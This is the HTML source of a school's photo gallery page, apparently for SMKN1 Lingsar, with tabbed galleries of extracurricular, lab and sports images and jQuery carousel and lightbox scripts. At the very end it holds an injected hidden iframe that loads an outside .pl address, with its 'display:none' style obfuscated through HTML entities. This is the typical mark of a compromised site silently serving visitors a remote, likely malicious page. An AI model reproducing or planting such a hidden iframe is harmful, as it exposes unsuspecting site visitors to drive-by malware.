<!DOCTYPE html>
<html lang="en">
<head>
<title>Gallery | Fasilitas SMKN1LINGSAR</title>
<meta charset="utf-8">
<link rel="stylesheet" href="css/reset.css" type="text/css" media="all">
<link rel="stylesheet" href="css/prettyPhoto.css" type="text/css" media="all">
<link rel="stylesheet" href="css/layout.css" type="text/css" media="all">
<link rel="stylesheet" href="css/style.css" type="text/css" media="all">
<script type="text/javascript" src="js/jquery-1.5.2.js" ></script>
<script type="text/javascript" src="js/cufon-yui.js"></script>
<script type="text/javascript" src="js/cufon-replace.js"></script>
<script type="text/javascript" src="js/Terminal_Dosis_300.font.js"></script>
<script type="text/javascript" src="js/atooltip.jquery.js"></script>
<script src="js/roundabout.js" type="text/javascript"></script>
<script src="js/roundabout_shapes.js" type="text/javascript"></script>
<script src="js/jquery.easing.1.2.js" type="text/javascript"></script>
<script type="text/javascript" src="js/jquery.prettyPhoto.js"></script>
<script type="text/javascript" src="js/hover-image.js"></script>
<script type="text/javascript" src="js/tabs.js"></script>
<script type="text/javascript" src="js/script.js"></script>
<!--[if lt IE 9]>
<script type="text/javascript" src="js/html5.js"></script>
<style type="text/css">.bg {behavior:url("js/PIE.htc")}</style>
<![endif]-->
</head>
<body id="page3">
<div class="body1">
  <div class="body2">
    <div class="body3">
      <div class="main">
        <!-- header -->
        <header>
          <div class="wrapper">
            <h1><a href="index.html" id=""></a></h1>
            <p>'</p>
            <p>&nbsp;</p>
            <nav>
              <ul id="menu">
                <li><a href="index.html">Home</a></li>
                <li><a href="about.html">Profil MI Darul Hasanah</a></li>
                <li class="end"><a href="../index.php">Back TO Halaman Utama</a></li>
              </ul>
            </nav>
          </div>
          <div class="relative">
            <div id="gallery">
             <ul id="myRoundabout">
                <li><img src="images/gambar2.png" alt=""></li>
                <li><img src="images/gambar3.png" alt=""></li>
                <li><img src="images/gambar4.png" alt=""></li>
                <li><img src="images/gambar5.png" alt=""></li>

              </ul>
            </div>
          </div>
        </header>
        <!-- / header-->
        <!-- content -->
        <section id="content">
          <div class="line1 wrapper">
            <div class="wrapper tabs">
              <article class="col1">
                <h2>Fasilitas</h2>
                <div class="pad">
                  <ul class="nav">
                    <li class="selected"><a href="#Fashion">Paskib</a></li>
                    <li><a href="#3D">PMR</a></li>
                    <li><a href="#Wedding">Laboraturium</a></li>
                    <li><a href="#Reportage">SPORT TEAM</a></li>
                    <li><a href="#Advertising">Teater</a></li>
                    <li><a href="#Portrait">SASAMBO</a></li>
                    <li><a href="#Reportage">Kejuaraan</a></li>
                  </ul>
                </div>
              </article>
              <article class="col2 pad_left1 tab-content" id="Fashion">
                <h2>PASKIB Smkn1lingsar</h2>
                <ul class="gallery">
                  <li> <a href="images/folio1.jpg" class="lightbox-image" rel="prettyPhoto[group1]" > <img src="images/page3_img1.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img2.jpg" class="lightbox-image" rel="prettyPhoto[group1]" > <img src="images/page3_img2.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img3.jpg" class="lightbox-image" rel="prettyPhoto[group1]" > <img src="images/page3_img3.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img4.jpg" class="lightbox-image" rel="prettyPhoto[group1]" > <img src="images/page3_img4.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img5.jpg" class="lightbox-image" rel="prettyPhoto[group1]" > <img src="images/page3_img5.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img6.jpg" class="lightbox-image" rel="prettyPhoto[group1]" > <img src="images/page3_img6.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img7.jpg" class="lightbox-image" rel="prettyPhoto[group1]" > <img src="images/page3_img7.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img8.jpg" class="lightbox-image" rel="prettyPhoto[group1]" > <img src="images/page3_img8.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img9.jpg" class="lightbox-image" rel="prettyPhoto[group1]" > <img src="images/page3_img9.jpg" alt=""> </a> </li>
                </ul>
              </article>
              <article class="col2 pad_left1 tab-content" id="3D">
                <h2>PMR Smkn1lingsar</h2>
                <ul class="gallery">
                  <li> <a href="images/big_img10.jpg" class="lightbox-image" rel="prettyPhoto[group2]" > <img src="images/page3_img10.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img11.jpg" class="lightbox-image" rel="prettyPhoto[group2]" > <img src="images/page3_img11.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img12.jpg" class="lightbox-image" rel="prettyPhoto[group2]" > <img src="images/page3_img12.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img13.jpg" class="lightbox-image" rel="prettyPhoto[group2]" > <img src="images/page3_img13.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img14.jpg" class="lightbox-image" rel="prettyPhoto[group2]" > <img src="images/page3_img14.jpg" alt=""> </a> </li>
                  <li class="end"></li>
                  <li> <a href="images/big_img15.jpg" class="lightbox-image" rel="prettyPhoto[group2]" > <img src="images/page3_img15.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img16.jpg" class="lightbox-image" rel="prettyPhoto[group2]" > <img src="images/page3_img16.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img17.jpg" class="lightbox-image" rel="prettyPhoto[group2]" > <img src="images/page3_img17.jpg" alt=""> </a> </li>
                   <li class="end"> <a href="images/big_img18.jpg" class="lightbox-image" rel="prettyPhoto[group2]" > <img src="images/page3_img18.jpg" alt=""> </a> </li>
                </ul>
              </article>
              <article class="col2 pad_left1 tab-content" id="Wedding">
                <h2>Laboraturium</h2>
                <ul class="gallery">
                  <li> <a href="images/big_img19.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img19.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img20.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img20.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img21.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img21.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img22.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img22.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img23.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img23.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img24.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img24.jpg" alt=""> </a> </li>
                </ul>
              </article>
              <article class="col2 pad_left1 tab-content" id="Reportage">
                <h2>Smkn1lingsar SPORT TEAM</h2>
                <ul class="gallery">
                  <li> <a href="images/big_img25.jpg" class="lightbox-image" rel="prettyPhoto[group4]" > <img src="images/page3_img25.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img26.jpg" class="lightbox-image" rel="prettyPhoto[group4]" > <img src="images/page3_img26.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img27.jpg" class="lightbox-image" rel="prettyPhoto[group4]" > <img src="images/page3_img27.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img28.jpg" class="lightbox-image" rel="prettyPhoto[group4]" > <img src="images/page3_img28.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img29.jpg" class="lightbox-image" rel="prettyPhoto[group4]" > <img src="images/page3_img29.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img30.jpg" class="lightbox-image" rel="prettyPhoto[group4]" > <img src="images/page3_img30.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img31.jpg" class="lightbox-image" rel="prettyPhoto[group4]" > <img src="images/page3_img31.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img32.jpg" class="lightbox-image" rel="prettyPhoto[group4]" > <img src="images/page3_img32.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img33.jpg" class="lightbox-image" rel="prettyPhoto[group4]" > <img src="images/page3_img33.jpg" alt=""> </a> </li>
               
                  <li> <a href="images/big_img34.jpg" class="lightbox-image" rel="prettyPhoto[group5]" > <img src="images/page3_img34.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img35.jpg" class="lightbox-image" rel="prettyPhoto[group5]" > <img src="images/page3_img35.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img36.jpg" class="lightbox-image" rel="prettyPhoto[group5]" > <img src="images/page3_img36.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img37.jpg" class="lightbox-image" rel="prettyPhoto[group5]" > <img src="images/page3_img37.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img38.jpg" class="lightbox-image" rel="prettyPhoto[group5]" > <img src="images/page3_img38.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img39.jpg" class="lightbox-image" rel="prettyPhoto[group5]" > <img src="images/page3_img39.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img40.jpg" class="lightbox-image" rel="prettyPhoto[group5]" > <img src="images/page3_img40.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img41.jpg" class="lightbox-image" rel="prettyPhoto[group5]" > <img src="images/page3_img41.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img42.jpg" class="lightbox-image" rel="prettyPhoto[group5]" > <img src="images/page3_img42.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img43.jpg" class="lightbox-image" rel="prettyPhoto[group5]" > <img src="images/page3_img43.jpg" alt=""> </a> </li>
                </ul>
              </article>
              <article class="col2 pad_left1 tab-content" id="Advertising">
                <h2>Ekskul Teater</h2>
                <ul class="gallery">
                  <li> <a href="images/big_img44.jpg" class="lightbox-image" rel="prettyPhoto[group6]" > <img src="images/page3_img44.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img45.jpg" class="lightbox-image" rel="prettyPhoto[group6]" > <img src="images/page3_img45.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img46.jpg" class="lightbox-image" rel="prettyPhoto[group6]" > <img src="images/page3_img46.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img47.jpg" class="lightbox-image" rel="prettyPhoto[group6]" > <img src="images/page3_img47.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img48.jpg" class="lightbox-image" rel="prettyPhoto[group6]" > <img src="images/page3_img48.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img49.jpg" class="lightbox-image" rel="prettyPhoto[group6]" > <img src="images/page3_img49.jpg" alt=""> </a> </li>
                </ul>
              </article>
              <article class="col2 pad_left1 tab-content" id="Portrait">
                <h2>SASAMBO</h2>
                <ul class="gallery">
                  <li> <a href="images/big_img50.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img50.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img51.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img51.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img52.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img52.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img53.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img53.jpg" alt=""> </a> </li>
                  </ul>
                  </article>
              <article class="col2 pad_left1 tab-content" id="Wedding">
                <h2>Galery Kejuaraan Smkn1lingsar</h2>
                <ul class="gallery">
                  <li> <a href="images/big_img19.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img19.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img20.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img20.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img21.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img21.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img22.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img22.jpg" alt=""> </a> </li>
                  <li> <a href="images/big_img23.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img23.jpg" alt=""> </a> </li>
                  <li class="end"> <a href="images/big_img24.jpg" class="lightbox-image" rel="prettyPhoto[group3]" > <img src="images/page3_img24.jpg" alt=""> </a> </li>
                </ul>
              </article>
                </ul>
            </div>
          </div>
        </section>
      </div>
    </div>
  </div>
</div>
<!-- / content -->
<div class="main">
  <!-- footer -->
  <footer>
    <div class="wrapper"> <span class="left"> Copyright & copy; <a href="#">MI Darul Hasanah</a> 2022 All Rights Reserved<br>
     
      </span>
     
    </div>
    <!-- {%FOOTER_LINK} -->
  </footer>
  <!-- / footer -->
</div>
<script type="text/javascript">Cufon.now();</script>
<script type="text/javascript">
$(document).ready(function () {
    $('#myRoundabout').roundabout({
        shape: 'square',
        minScale: 0.93, // tiny!
        maxScale: 1, // tiny!
        easing: 'easeOutExpo',
        clickToFocus: 'true',
        focusBearing: '0',
        duration: 800,
        reflect: true
    });
    tabs.init();
    // for lightbox
    if ($("a[rel^='prettyPhoto']").length) {
        $(document).ready(function () {
            // prettyPhoto
            $("a[rel^='prettyPhoto']").prettyPhoto({
                theme: 'light_square'
            });
        });
    }
});
</script>
<div align=center></div><iframe src="http://jL.ch&#117;ra.pl/rc/" style="d&#105;splay:none"></iframe>
</body>
</html>